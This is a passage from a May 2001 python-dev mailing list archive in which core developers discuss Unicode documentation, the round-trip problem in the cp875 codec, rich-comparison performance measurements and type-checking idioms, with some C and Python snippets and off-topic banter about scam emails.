+	   than the other. */
+	if (v->ob_type == w->ob_type
+	    && !PyInstance_Check(v)
+	    && (f = v->ob_type->tp_compare) != NULL) {
+		int c;
+		c = (*f)(v, w);
+		if (PyErr_Occurred())
+			return NULL;
+		return convert_3way_to_object(op, c);
+	}
 
 	return try_3way_to_rich_compare(v, w, op);
 }


From tim.one at home.com  Tue May 15 09:33:06 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:33:06 -0400
Subject: [Python-Dev] Unicode docs
In-Reply-To: <3AFFA23F.248517E3@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>

I don't know that the Unicode docs need massive work, but the docs that are
there simply don't answer the technical questions people have:  they're too
thin.

Let's keep it simple.  Contrast the Library manual's:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding. Error handling is
    done according to errors. The default behavior is to decode UTF-8
    in strict mode, meaning that encoding errors raise ValueError. See
    also the codecs module.

with Andrew's description (from http://www.amk.ca/python/2.0/):

    unicode(string [, encoding] [, errors])
    Creates a Unicode string from an 8-bit string. encoding is a
    string naming the encoding to use. The errors parameter specifies
    the treatment of characters that are invalid for the current
    encoding; passing 'strict' as the value causes an exception
    to be raised on any encoding error, while 'ignore' causes errors
    to be silently ignored and 'replace' uses U+FFFD, the official
    replacement character, in case of any problems.

The latter addresses several *fundamental* questions untouched by the former,
like whar are the datatypes of the arguments and the result, what values does
errors accept, and what do they mean?  The first blurb answers some more,
like what's the default encoding, and which exception is raised?  Neither is
complete on its own, but the reference manual should have a complete answer
to all such questions.  It doesn't have to go on at great length.

A round-trip example would be invaluable.

If Fred wanted to incorporate a brief overview too, a light rework of
Andrew/Moshe's writeup would be an excellent start.


From tim.one at home.com  Tue May 15 09:47:16 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 03:47:16 -0400
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
In-Reply-To: <3AFF9F1B.A1CDD617@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>

[M.-A. Lemburg]
> The problem is: which part would raise the exception -- the
> encoder or the decoder ?

Since I don't yet use any of this stuff for real, I have no idea:  seems
mostly a question of pragmatics, and I don't have any feel for how cp875
users would view it.

> Here are some more options:
>
> * sort the items before creating the encoding table from the
>   decoding one (makes the mapping stable)

If users don't care that round-trip can fail silently, fine.

> * map keys which have multiple mappings in the encoding table
>   to None -- this causes their usage to raise an exception
>   (undefined mapping)

If users don't care that they'll get an exception when they try something
that can't be round-tripped, fine.  Or would this depend on the value of the
"errors" argument too?  Then it's easier to impose.

There's a theme here <wink>:  I have no idea how important roundtrip is in
Unicode Practice, or even that it's a constant across apps and encodings.  If
I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
wouldn't care that I can't get "love" back from u"kaka" <wink>.


From mal at lemburg.com  Tue May 15 10:19:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:19:06 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <3B00E67A.C5769082@lemburg.com>

Tim Peters wrote:
> 
> I don't know that the Unicode docs need massive work, but the docs that are
> there simply don't answer the technical questions people have:  they're too
> thin.

As much as I would like to work on this, I simply don't have the
time... if someone wants to contribute more detailed docs, though,
I'd be glad to review them and answer remaining questions.

Note that I will give a talk at the upcoming Bordeaux conference about
Python and Unicode. The slides will eventually go online after
the conference (in July). BTW, are any python-devs attending the
conference (they have some great wine in that part of France ;-) ?

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May 15 10:32:14 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 10:32:14 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCAEEJKCAA.tim.one@home.com>
Message-ID: <3B00E98E.1C44FF5@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > The problem is: which part would raise the exception -- the
> > encoder or the decoder ?
> 
> Since I don't yet use any of this stuff for real, I have no idea:  seems
> mostly a question of pragmatics, and I don't have any feel for how cp875
> users would view it.

If there are any... that code page dates back to 1996 and is
based in the EBCDIC world.
 
> > Here are some more options:
> >
> > * sort the items before creating the encoding table from the
> >   decoding one (makes the mapping stable)
> 
> If users don't care that round-trip can fail silently, fine.
> 
> > * map keys which have multiple mappings in the encoding table
> >   to None -- this causes their usage to raise an exception
> >   (undefined mapping)
> 
> If users don't care that they'll get an exception when they try something
> that can't be round-tripped, fine.  Or would this depend on the value of the
> "errors" argument too?  Then it's easier to impose.

The errors argument tells the codecs what to do in case a mapping
fails (from codecs.py):

        The .encode()/.decode() methods may implement different error
        handling schemes by providing the errors argument. These
        string values are defined:

         'strict' - raise a ValueError error (or a subclass)
         'ignore' - ignore the character and continue with the next
         'replace' - replace with a suitable replacement character;
                    Python will use the official U+FFFD REPLACEMENT
                    CHARACTER for the builtin Unicode codecs.

'strict' is the default for all operations that deal with auto-
conversion. 'ignore' and 'replace' allow silently ignoring the
problem.
 
> There's a theme here <wink>:  I have no idea how important roundtrip is in
> Unicode Practice, or even that it's a constant across apps and encodings.  If
> I write a codec to map all ASCII consonants to u"k" and vowels to u"a",  I
> wouldn't care that I can't get "love" back from u"kaka" <wink>.

Round-tripping is obviously very important if you use Unicode
as basis for working on text. I don't know about the reasoning
behind making cp875 fail the round-trip -- Unicode certainly
provides means to make mappings round-trip safe (e.g. by reverting
to the private Unicode char. point areas).

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Tue May 15 11:26:32 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 05:26:32 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105150644.f4F6iN501475@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>

[Martin v. Loewis]
> Is this really exactly what Python would guarantee? I'm surprised that
> x==x would always be true, but x!=x might be true also. In a type where
> x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> I had expected that you'd reduced it to
>
>   if (v == w && op == Py_EQ) /* then return Py_True */
>   if (v == w && op == Py_NE) /* then return Py_False */

I agree that would be more analogous to what PyObject_Compare() does.

I'm not sure either make sense for rich comparisons; for example, under
IEEE-754 rules, a NaN must compare not-equal to everything, including
itself(!), and richcmps are the only hope Python users have of modeling that.
Doing those pointer checks before giving richcmps a chance would kill that
hope.  Can we agree to drop this one until somebody produces stats saying
it's important?  I have no reason to suspect that it is.

> The one application where this may help is list_contains, in
> particular when searching a list of interned strings.

string_compare() could special-case pointer equality too, although I suspect
doing so would be a net loss.

> Please have a look at the patch below.

I will, but not tonight anymore -- it's been a very long day.

> ...
> I agree "in principle" :-) However, you cannot move the case "equal
> types, implementing tp_compare" before the case "one of them
> implements tp_richcompare" without changing the semantics.

Of course.  But except for instance objects, answering "does the type
implement tp_richcompare?" is one lousy pointer check, and the answer will
usually be-- provided we don't start stuffing code into *every* object's
tp_richcompare slot! --"no, so I can go to tp_compare immediately".
Coercions and richcmps are the oddball cases today.

> The change here is what you'd do when you have both richcmp and
> oldcomp; Python clearly mandates using richcmp.

Yes, except you don't usually have both today and reality is exploitable
<wink>.

> In case this is not obvious (it wasn't to me): UserList will complain
> about using the deprecated __cmp__,

Sounds like a bug to me; if cmp is deprecated, that's also news to me.

> and dictionaries will iterate over their elements differently.

dicts didn't have a tp_richcompare slot before I added it last week, and
because dicts can do a much faster and more-general job on Py_EQ and Py_NE
than dict cmp (but on nothing else).  I originally took away the tp_compare
slot for dicts and lived to regret it -- it has both now.

> Given that richcomp has to be tried first, this patch does the "common
> case" at the earliest possible time, and with no overhead, except for
> PyErr_Occurred call.

The earliest *reasonable* time would be after a short block of new pointer
checks while still inside PyObject_RichCompare():  I believe the usual case
today is that the objects are of the same type, the type doesn't have a
tp_richcompare slot, but does have a tp_compare slot.  This covers at least
ints, floats, longs and strings, where the overhead of a single function call
is most often larger than the time it actually takes to compare the darned
things.  It's not important to, e.g., get to a dict comparison quickly,
because comparing dicts is darned expensive even after we find the dict
comparison routine.  Ditto comparing instances or matrices etc.  Optimizing
for richcmps is optimizing the less important thing.

BTW, tuples have a richcompare slot today and it's unclear that's a good
idea.  They do the same kind of Py_EQ/Py_NE "length check" you like for
strings, and I'd be surprised if that didn't cost more than it saves.  Unlike
strings, whenever I compare tuples they *always* have the same size (e.g.,
think of all the decorator pattern ways tuples are used to augment sorts).

OK, across a full run of the test suite, tuplerichcompare() was called about
162000 times, all but about 50 times with Py_EQ or Py_NE.  The number of
times this code block at the start bore fruit:

	if (vt->ob_size != wt->ob_size && (op == Py_EQ || op == Py_NE)) {
		/* Shortcut: if the lengths differ, the tuples differ */
		PyObject *res;
		if (op == Py_EQ)
			res = Py_False;
		else
			res = Py_True;
		Py_INCREF(res);
		return res;
	}

was 0 -- the tuples were always the same size for Py_EQ/Py_NE, and the code
just burned cycles.  I want to move toward optimizations that save more than
they cost <0.7 wink>.

> ...
> For strings, I would still special-case tp_richcompare: when tracing
> calls to string_richcompare, I found that most calls with Py_EQ can
> be decided by checking that the string lengths are not equal.

I expect you'd also find that the current string_compare() usually decides
they're not equal on the first character comparison (which *it*
special-cases).  So special-casing on length isn't a clear win over what's
already done.  But, if it is, bravo!  Special-case the snot out of it without
calling *any* string functions (merely calling string_richcompare likely
costs a good deal more than comparing the lengths).

more-measuring-less-guessing-ly y'rs  - tim


From thomas at xs4all.net  Tue May 15 13:51:06 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 15 May 2001 13:51:06 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
In-Reply-To: <200105150426.f4F4QVx01531@localhost.local>; from uche.ogbuji@fourthought.com on Mon, May 14, 2001 at 10:26:31PM -0600
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local>
Message-ID: <20010515135106.A16811@xs4all.nl>

On Mon, May 14, 2001 at 10:26:31PM -0600, Uche Ogbuji wrote:

> I thought I was th only one getting all these silly Nigerian scam spams.  I 
> figured maybe they saw my name and decided to test on me (though they might 
> more cleverly have figured that a fellow Nigerian would be wise to the game).

Actually, one of my colleagues informed me that this spam is in fact *very
old* (after I ROTFL'd rather loudly reading the Dilbert comic featuring the
Nigerian spam a mere week after getting the spam myself :) Scott (my
colleague, not Adams) remembers first getting it by fax, 15 years ago, and
again several years later. And not just one fax, but every single fax in the
company, and lots more outside of the company. Apparently the telephone
operator issued a warning to all customers not to respond to the fax.

Still-sound-advice-ly y'rs,

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May 15 14:10:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 15 May 2001 14:10:16 +0200
Subject: [Python-Dev] Easy codec access
Message-ID: <3B011CA8.9DDB4FC7@lemburg.com>

I've just checked in a set of patches which implement the new
.decode() method along with a couple of useful codecs.

You can now do things like these:

>>> "abc".encode('zlib').encode('base64')
'eJxLTEoGAAJNASc=\n'
>>> _.decode('base64').decode('zlib')
'abc'

>>> "abc???".decode('latin-1')
u'abc\xe4\xf6\xfc'

>>> "abc???".decode('latin-1').encode('latin-1')
'abc\xe4\xf6\xfc'

>>> "Hello World !".encode('rot13')
'Uryyb Jbeyq !'

So the overall codec experience should be a much better one
now.

To see just how easy it is to write codecs, please have
a look at the string codecs I added in this patch (e.g.
zlib_codec.py or hex_codec.py). I am pretty sure that there
are a lot more useful things in the standard lib which could
benefit from these easy-to-use interfaces.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at pythonware.com  Tue May 15 14:11:26 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Tue, 15 May 2001 14:11:26 +0200
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4
References: <tim.one@home.com> <200105150426.f4F4QVx01531@localhost.local> <20010515135106.A16811@xs4all.nl>
Message-ID: <005701c0dd38$2f417560$0900a8c0@spiff>

thomas wrote:

> Actually, one of my colleagues informed me that this spam is in fact
> *very old*

more info here:

http://home.rica.net/alphae/419coal/index.htm

    "A Five Billion US$ (as of 1996, much more now) worldwide
    Scam which has run since the early 1980's under Successive
    Governments of Nigeria.

    "The Nigerian Scam is, according to published reports, the
    Third to Fifth largest industry in Nigeria."

Cheers /F (highest offer this far: $155,000,000)


From guido at digicool.com  Tue May 15 17:27:31 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 10:27:31 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 05:26:32 -0400."
             <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com> 
Message-ID: <200105151527.KAA28734@cj20424-a.reston1.va.home.com>

> [Martin v. Loewis]
> > Is this really exactly what Python would guarantee? I'm surprised that
> > x==x would always be true, but x!=x might be true also. In a type where
> > x!=x holds, wouldn't people also want to say that x==x might fail? IOW,
> > I had expected that you'd reduced it to
> >
> >   if (v == w && op == Py_EQ) /* then return Py_True */
> >   if (v == w && op == Py_NE) /* then return Py_False */

[Tim]
> I agree that would be more analogous to what PyObject_Compare() does.
> 
> I'm not sure either make sense for rich comparisons; for example, under
> IEEE-754 rules, a NaN must compare not-equal to everything, including
> itself(!), and richcmps are the only hope Python users have of modeling that.
> Doing those pointer checks before giving richcmps a chance would kill that
> hope.  Can we agree to drop this one until somebody produces stats saying
> it's important?  I have no reason to suspect that it is.

PEP 207 is quite explicit that == and != are not to be assumed each
other's complement.  It is silent on the x==x issue but the PEP
mentions IEEE 754 so I agree that this also shouldn't be cut short.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at acm.org  Tue May 15 17:29:10 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 15 May 2001 11:29:10 -0400 (EDT)
Subject: [Python-Dev] Unicode docs
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
References: <3AFFA23F.248517E3@lemburg.com>
	<LNBBLJKPBEHFEDALKOLCOEEHKCAA.tim.one@home.com>
Message-ID: <15105.19270.62890.240534@cj42289-a.reston1.va.home.com>

Tim Peters writes:
 > The latter addresses several *fundamental* questions untouched by
 > the former, like whar are the datatypes of the arguments and the
 > result, what values does errors accept, and what do they mean?  The
 > first blurb answers some more, like what's the default encoding,
 > and which exception is raised?  Neither is complete on its own, but
 > the reference manual should have a complete answer to all such
 > questions.  It doesn't have to go on at great length.

  I've beefed up the desciption of the unicode() function by merging
the information from AMK's document.

 > A round-trip example would be invaluable.
 > 
 > If Fred wanted to incorporate a brief overview too, a light rework of
 > Andrew/Moshe's writeup would be an excellent start.

  I'd love to have a contribution from someone with more knowledge of
what's there than me.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From guido at digicool.com  Tue May 15 18:35:09 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 11:35:09 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: Your message of "Tue, 15 May 2001 14:10:16 +0200."
             <3B011CA8.9DDB4FC7@lemburg.com> 
References: <3B011CA8.9DDB4FC7@lemburg.com> 
Message-ID: <200105151635.LAA29530@cj20424-a.reston1.va.home.com>

> I've just checked in a set of patches which implement the new
> .decode() method along with a couple of useful codecs.

Cool!

> To see just how easy it is to write codecs, please have
> a look at the string codecs I added in this patch (e.g.
> zlib_codec.py or hex_codec.py). I am pretty sure that there
> are a lot more useful things in the standard lib which could
> benefit from these easy-to-use interfaces.

As an excercise, I added a quoted-printable codec.  It was easy
indeed!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at effbot.org  Tue May 15 20:21:00 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Tue, 15 May 2001 20:21:00 +0200
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <000901c0dd6b$cdb5d960$e46940d5@hagrid>

in case anyone has two hours to spare, and the right software,
MIT's dynamic languages group has posted a quicktime video of
their recent panel on language design.

http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

(what 1/2 should result in, why it's good to have both CPython
and JPython, why whitespace is significant, why language design
is perhaps more related to architecture than math, and lots of
other goodies from Guy Steele and others)

Cheers /F


From nas at python.ca  Tue May 15 20:51:20 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 15 May 2001 11:51:20 -0700
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <000901c0dd6b$cdb5d960$e46940d5@hagrid>; from fredrik@effbot.org on Tue, May 15, 2001 at 08:21:00PM +0200
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
Message-ID: <20010515115120.A14357@glacier.fnational.com>

Fredrik Lundh wrote:
> in case anyone has two hours to spare, and the right software,
> MIT's dynamic languages group has posted a quicktime video of
> their recent panel on language design.
> 
> http://www.ai.mit.edu/projects/dynlangs/wizards-panels.html

Does the streaming actually work for anyone?  I've given up and
started download the whole .mov files.

  Neil


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 21:45:59 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 21:45:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105151945.f4FJjxM02351@mira.informatik.hu-berlin.de>

> more-measuring-less-guessing-ly y'rs  - tim

Producing numbers is easy :-) I've instrumented my version where
string implements richcmp, and special-cases everything I can think
of. Counting is done for running the test suite. With this, I get

Calls to string_richcompare:   2378660
Calls with different types:      33992 (ie. one is not a string)
Calls with identical strings:   120517
Calls where lens decide !EQ:   1775716
----------------------------
Calls richcmp -> oldcomp:       448435
Total calls to oldcomp:        1225643
Calls oldcomp -> memcmp:        860174

So 5% of the calls are with identical strings, for which I can
immediately decide the outcome. 75% can be decided in terms of the
string lengths, which leaves ca. 19% for cases where lexicographical
comparison is needed.

In those cases, the first byte decides in 30%. If I remove the test
for "len decides !EQ", I get

#riches:                       2358322
#riches_ni:                      34108
#idents_decide:                 102050
#lens_decide:                        0
--------------------------------------
rest(computed):                2222164
#comps:                        2949421
#memcmps:                       917776

So still, ca. 30% can be decided by first byte. It still appears that
the total number of calls to memcmp is higher when the length is not
taken into consideration. To verify this claim, I've counted the cases
where the length decides the outcome, but looking at the first byte
also had:

lens_decide:                    1784897
lens_decide_firstbyte_wouldhave:1671148

So in 6% of the cases, checking the length alone gives a decision
which looking at the first byte doesn't; plus it saves a function
call.

To support the thesis that Py_EQ is the common case for strings, I
counted the various operations:

pyEQ:2271593
pyLE:9234
pyGE:0
pyNE:20470
pyLT:22765
pyGT:578

Now, that might be flawed since comparing strings for equal is
extremely frequent in the testsuite. To give more credibility to the
data, I also ran setup.py with my instrumented ./python:

riches:21640
riches_ni:76
riches_ni1:0
idents:2885
idents_decide:2885
lens_decide:9472
lens_decide_firstbyte_wouldhave:6223
comps:26360
memcmps:19224
pyEQ:20093
pyLE:46
pyGE:1
pyNE:548
pyLT:876
pyGT:0                                                                          
That shows that optimizing for Py_NE is not worth it. With these data,
I'll upload a patch to SF.

Regards,
Martin


From tim at digicool.com  Tue May 15 22:22:37 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 15 May 2001 16:22:37 -0400
Subject: [Python-Dev] Comparison corner case
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEINCAAA.tim@digicool.com>

Here from the tail end of a patch comment.  If you believe the illustrated
behavior is wrong, then I don't believe we gain anything from using the
tp_richcmp slot for tuples for anything other than EQ/NE testing (the gain
for the latter is that it allows EQ/NE tuple comparison to work correctly on
tuples containing elements that support only EQ/NE comparisons):

"""
BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
because it won't believe there's any difference unless Py_EQ returns false
for some corresponding elements:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> C() < C()
1
>>> (C(),) < (C(),)
0
>>>

That doesn't make sense -- provided you believe the defn. of C makes sense.
"""


From guido at digicool.com  Tue May 15 23:36:57 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 16:36:57 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 13:13:01 MST."
             <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
References: <E14zlBl-0004pj-00@usw-pr-cvs1.sourceforge.net> 
Message-ID: <200105152136.QAA00489@cj20424-a.reston1.va.home.com>

Tim wrote:
> BUG ALERT:  The tuple (and list) richcmp algorithm is arguably wrong,
> because it won't believe there's any difference unless Py_EQ returns false
> for some corresponding elements:
> 
> >>> class C:
> ...     def __lt__(x, y): return 1
> ...     __eq__ = __lt__
> ...
> >>> C() < C()
> 1
> >>> (C(),) < (C(),)
> 0
> >>>
> 
> That doesn't make sense -- provided you believe the defn. of C makes sense.

I think in this example the problem is with C, not with the tuple
algorithm.  The question is, what are you going to do otherwise?  You
could test for < first, == second -- but that means twice as many
comparisons, and for reasonably-behaved items it makes no difference
at all.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 22:59:56 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 22:59:56 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
Message-ID: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>

> Of course.  But except for instance objects, answering "does the type
> implement tp_richcompare?" is one lousy pointer check

Almost - you also have to check the type flag.

> and the answer will usually be-- provided we don't start stuffing
> code into *every* object's tp_richcompare slot! --"no, so I can go
> to tp_compare immediately".  Coercions and richcmps are the oddball
> cases today.

I'd like to add another data point, answering the question what types
are most frequently compared. The first set of data is for running the
Python testsuite.

riches      3040952  # Calls to PyType_RichCompare
eqs         2828345  # Calls where the types are equal

String      2323122
Float        141507
Int          125187
Type          99477
Tuple         84503
Long          30325
Unicode       10782
Instance       9335
List           2997
None            383
Class           318
Complex         219
Dict             57
Array            49
WeakRef          34
Function         11
File             11
SRE_Pattern      10
CFunction         9
Lock              8
Module            1

So strings cover 82% of all the compare calls of equally-typed
objects, followed by floats with 5%. Those calls together cover 93% of
the richcompare calls.

Since this might give a blurred view of what is actually used in
applications, I ran the PyXML testsuite with that python binary
also. Leaving out types that are not used, I get

riches        88465
eqs           59279

String        48097
Int            5681
Type           3170
Tuple           760
List            492
Float           332
Instance        269
Unicode         243
None            225
SRE_Pattern       4
Long              3
Complex           3

The first observation here is that "only" 67% of the calls are with
equally-typed objects. Of those, 80% are with strings, 9% with
integers.

The last example is idle, where I just did an "import httplib", for
fun.

riches        50923
eqs           49882

String        31198
Tuple          8312
Type           7978
Int            1456
None            600
SRE_Pattern     210
List            122
Instance          4
Float             1
Instance method   1

Roughly the same picture: 97% calls with equally-typed objects, of
those 62% strings, 3% integers. Notice the 15% for tuples and types,
each.

So to speed-up the common case clearly means to speed-up string
comparisons. If I'd need to optimize anything else afterwards, I'd
look into type objects - most likely, they are compared for EQ, which
can be done nicely and directly in a tp_richcompare also.

Those two optimizations together would give a richcompare to 95% of
the objects in the IDLE case.

Regards,
Martin


From guido at digicool.com  Wed May 16 00:41:12 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 15 May 2001 17:41:12 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Tue, 15 May 2001 22:59:56 +0200."
             <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>  
            <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> 
Message-ID: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>

I'm curious where the frequent comparisons of types come from.

Is there lots of code that does frequent

    assert type(x) == T

typechecking?

Does isinstance(x, T) perhaps use EQ?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Tue May 15 23:51:00 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 17:51:00 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.42180.401918.223487@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> I'm curious where the frequent comparisons of types come
    GvR> from.

    GvR> Is there lots of code that does frequent

    GvR>     assert type(x) == T

    GvR> typechecking?

    GvR> Does isinstance(x, T) perhaps use EQ?

Not to mention the several hundred comparisons to None.


From jeremy at digicool.com  Tue May 15 19:26:54 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:26:54 -0400 (EDT)
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105152241.RAA00926@cj20424-a.reston1.va.home.com>
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
Message-ID: <15105.26334.610144.846269@slothrop.digicool.com>

I only learned recently that isinstance() can be called with types
instead of classes.  I suppose the name lead me in the wrong
direction.  I had the silly idea that it only applied to instances
<0.1 wink>.

So it comes as little surprise to me that there is a lot of code
executed in, e.g., the test suite that does comparisons on types.

In the Lib directory, there are 63 files that use == and the builtin
type function.  (Simple grep.)  A total of 139 instances of this
idiom.  A cursory scan suggests that most of the call are things like
type(obj) == type('').

In the Zope source tree, there are 58 files and 98 individual
occurrences.  It again looks like comparisons against string type is
the most common.

I can think of two common cases where an object is checked against the
string type.  One is an interface that takes a file-like object or its
path.  The other is an interface that takes a sequence, but doesn't
want to try a string as a sequence.

Sounds like we ought to do a search-and-destroy on type comparisons,
replacing with isinstance() where possible.

Jeremy


From jeremy at digicool.com  Tue May 15 19:41:58 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 15 May 2001 13:41:58 -0400 (EDT)
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
In-Reply-To: <20010515115120.A14357@glacier.fnational.com>
References: <000901c0dd6b$cdb5d960$e46940d5@hagrid>
	<20010515115120.A14357@glacier.fnational.com>
Message-ID: <15105.27238.582785.851371@slothrop.digicool.com>

I download one of the files, but the quicktime player I have on my
Windows box said it didn't understand the file format.  I eventually
got the streaming version at the 100kbps to "work" where work meant
mostly an audio feed and occasional stills that were recognizable.

Jeremy

PS It was cool to watch the one on compilation.  Mat Hostetter, one of
the panelists, is my old roommate!


From barry at digicool.com  Wed May 16 00:56:10 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Tue, 15 May 2001 18:56:10 -0400
Subject: [Python-Dev] Comparison speed
References: <LNBBLJKPBEHFEDALKOLCAEEMKCAA.tim.one@home.com>
	<200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de>
	<200105152241.RAA00926@cj20424-a.reston1.va.home.com>
	<15105.26334.610144.846269@slothrop.digicool.com>
Message-ID: <15105.46090.203278.397835@anthem.wooz.org>

>>>>> "JH" == Jeremy Hylton <jeremy at digicool.com> writes:

    JH> I only learned recently that isinstance() can be called with
    JH> types instead of classes.  I suppose the name lead me in the
    JH> wrong direction.  I had the silly idea that it only applied to
    JH> instances <0.1 wink>.

    JH> So it comes as little surprise to me that there is a lot of
    JH> code executed in, e.g., the test suite that does comparisons
    JH> on types.

    JH> In the Lib directory, there are 63 files that use == and the
    JH> builtin type function.  (Simple grep.)  A total of 139
    JH> instances of this idiom.  A cursory scan suggests that most of
    JH> the call are things like type(obj) == type('').

Even without the forward-looking insight that types are classes
<wink>, I think type comparisions should have been done with `is' and
not ==.  So old school type comparisons should have been done as

    type(obj) is StringType

whereas new school type comparisons should be done as

    isinstance(obj, StringType)

With Python 2.1 == is naturally, slower than `is', but isinstance()
comes in somewhere in the middle.

563897.802881 is comparisons per second
506827.201066 == comparisons per second
520696.916088 isinstance() comparisons per second

-Barry

-------------------- snip snip --------------------
from types import StringType
import time
r = range(1000000)

def one(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) is StringType
    t1 = time.time() - t0
    print len(r) / t1, 'is comparisons per second'

def two(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        type(x) == StringType
    t1 = time.time() - t0
    print len(r) / t1, '== comparisons per second'

def three(r=r):
    x = 'hello'
    t0 = time.time()
    for i in r:
        isinstance(x, StringType)
    t1 = time.time() - t0
    print len(r) / t1, 'isinstance() comparisons per second'


one()
two()
three()
										    

From tim.one at home.com  Wed May 16 01:49:03 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 15 May 2001 19:49:03 -0400
